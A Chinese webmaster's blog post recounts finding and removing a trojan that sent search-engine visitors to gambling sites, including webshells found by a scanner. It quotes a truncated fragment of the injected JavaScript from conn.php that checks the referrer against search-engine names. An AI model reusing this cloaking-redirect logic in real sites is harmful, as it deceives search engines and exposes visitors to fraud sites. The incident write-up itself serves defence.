网站被中木马并跳转到博彩网的查杀过程

访问站点只要后面目录带apk(不管是文件还是目录),就会判断请求头,如果为手机移动端的请求头,就会跳转到*网站,如果是电脑PC浏览器,就会弹空白页访问站点,让你看不到跳转后的网址,只要域名后面地址带apk(不管是文件还是目录),就会判断请求头,如果为手机移动端的请求头,就会跳转bc网站,如果是电脑浏览器,就会弹空白页,最近也加上客户订单越来越少,领导也是着急,很大一部分客户渠道来源都从百度点击来的,静下心来看看网站到底是怎么回事,不看不要紧,简直吓我一跳。网站在百度里的收录增加许多,本来以为是更新的文章导致的,可是仔细一想也没那么多的收录呀,site:网站,点击到十页以后竟然发现了问题的关键,百度收录了一大堆我们网站没有的URL链接,复制那个我们域名的链接,提示不存在,从百度收录点进去跳转到BC网站。

排查过程

最初判断可能是修改了js文件,但经过长时间的浏览,文件内容搜索等等该用上的技能都用上了,头皮都发麻了,翻了2个小时,都没有发现js修改的一点痕迹,而且发现这个服务器的所有站点都有这个问题,看起来事情并不简单,现在的当务之急是尽快解决这个问题,否则影响太大。通过服务器的SINESAFE木马查杀工具,查杀出多个变形的webshell,以及隐藏属性无法删除的木马文件,本地扫描两个上传文件,火绒均报毒。

我这才明白过来,原来是我网站被黑了。赶紧打开服务器里的各个站点,下载网站程序代码到本地,然后挨个对每一个代码进行查看,查看是不是网站被黑客植入了木马后门,果不其然在每个网站根目录里的conn.php发现了黑客插入的恶意代码:

functiongo_bots_url(){varinit_flag=”apk”,bct=document.referrer,bot=[‘baidu’,’google’,’yahoo’,’bing’,’soso’,’sogou’,’360.cn’,’so.com’,’youdao’,’anquan’,’sm.cn’];//,’haosou’];for(variinbot){if(bct.indexOf(bot[i])!=-1){init_flag=”apk”;

去除掉恶意代码后,网站从百度搜索点击进来的也正常显示了,真是太*了,在服务器中查看隐藏属性的文件普通肉眼是看不到的,需要用专门的SINESAFE木马查杀工具才能看到,怪不得我找了大半天都没找到问题根源。接下来的工作就是抓紧修复网站漏洞,以及对服务器上的所有站点进行排查和漏洞修复,防止被再次攻击跳转,如果大家对程序代码不太熟悉无法修复漏洞的话可以到网站安全公司去看看。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至253000106@qq.com举报,一经查实,本站将立刻删除。

发布者:SEO优化专员,转转请注明出处:https://www.chuangxiangniao.com/p/896325.html

(0)
上一篇 2025年1月4日 00:35:14
下一篇 2025年1月4日 00:35:35

AD推荐 黄金广告位招租... 更多推荐

相关推荐

  • 电脑管家3月安全报告:挂马攻击大范围爆发,敲诈木马依然活跃

    病毒种类不断更新,其中漏洞挂马有爆发性增长,大量知名软件的客户端存在遭受挂马攻击的现象。近日,腾讯电脑管家发布《2016年3月管家病毒木马安全形势报告》(以下简称《报告》),《报告》披露并详细分析漏洞挂马以及敲诈木马,作出针对性方案,确保用…

    安全 2025年1月4日
    100
  • 物联网最强病毒现身:冰箱、电视永久罢工

    如今传统的电视、冰箱、空调甚至是微波炉这样的传统家电也都要在开头带上“智能”二字,物联网从最初的设想真正走进了人们生活。 不过,物联网在提供方便的同时也称为黑客们新的攻击目标。 网络安全公司Radware近日揭露了一个比Mirai物联网病毒…

    安全 2025年1月4日
    100
  • 广告有毒!大规模播放器挂马攻击预警

    360云安全系统日前监测到一起大规模软件挂马攻击事件。受影响软件包括国内多款视频播放器,部分输入法及新闻类客户端。攻击团伙通过页面广告,向软件内插入攻击代码,进而在用户设备上植入后门,后续进行勒索、挖矿、软件推广等多种恶意操作。目前,360…

    安全 2025年1月4日
    100
  • 逃离北上广 新型木马病毒StealthBot偏爱中小城市

    随着智能手机的普及,用户在非WiFi环境下阅读资讯、浏览视频成为一种常态,而手机流量的频繁消耗也引诱了不法分子,将黑手伸向移动流量领域。根据360烽火实验室近日发布的《StealthBot:150余个小众手机品牌预置刷量木马销往中小城市》报…

    安全 2025年1月4日
    100
  • 瑞星2018年中国网络安全报告:挖矿与勒索病毒成一体化趋势

    近日,瑞星发布了《2018年中国网络安全报告》,报告显示2018年病毒活动十分活跃,数据泄露和网络攻击事件频发,包括Facebook、GitHub、A站、华住酒店、台积电等全球大中小企业均遭受不同程度的影响,网络安全依然不容小觑。 2018…

    2025年1月4日
    100
  • 新一代网络安全 华清信安TDR4.0版本重磅发布

    2021年2月,华清信安TDR智能安全运营平台4.0版本正式发布。TDR4.0版本全面进行升级,可以为融媒体中心、城市安全运营中心、等智能数据中心场景提供一站式安全监测防护解决方案,TDR4.0版本拥有更全面安全防护、丰富直观数据展示与预警…

    2025年1月4日
    100
  • 织梦dedecms经常被挂马问题的解决方法

    网站被挂马是比较常见的网站问题,也是令很多站长比较头痛的问题,因为它会严重影响着网站SEO的优化工作,有可能让你的网站排名在一夜之间回到解放前。那么对于这个问题,今天小编就为大家讲述一下解决的方法。 大家最常用的办法就是:把挂马的入口文件删…

    建站经验 2025年1月4日
    100
  • 企业网站SEO诊断分析和优化方案

    如果你也有以上的疑问,网销君建议你还是赶紧做个 SEO诊断吧! 1、全面SEO诊断服务,企业可以获得最专业的SEO指导,避免在自己摸索中浪费大量时间。 2、全面SEO诊断服务,企业可以系统了解网站存在的问题,稳定快速提高网站权重。 3、网站…

    搜索优化 2025年1月4日
    100
  • 网站做渗透测试服务的准备条件

    对于客户的渗透测试来说,在进行前与用户沟通某些有关事项是非常必要的:首先是渗透测试的目的:用户这次的需求是什么?等待保险、日常安全检查或者其他目的,不同的目的决定了不同的漏洞评估等级,在测试过程中也感受到不同的方法。二是渗透测试总体目标:总…

    建站经验 2025年1月4日
    100
  • 网站被黑了怎么办 首先学会漏洞扫描

    作为一个站长,很难不发生网站被黑的情况。网站被黑总会带来非常多不好的影响,那么我们要怎么预防呢? 首先要知道什么表现是网站被黑了 分析系统日志、服务器日志,检查自己站点的页面数量、流量等是否有异常波动,是否存在异常访问或操作日志,检查网站文…

    网站运营 2025年1月3日
    200

发表回复

登录后才能评论

联系我们

156-6553-5169

在线咨询: QQ交谈

邮件:253000106@qq.com

工作时间:周一至周五,9:30-18:30,节假日休息

联系微信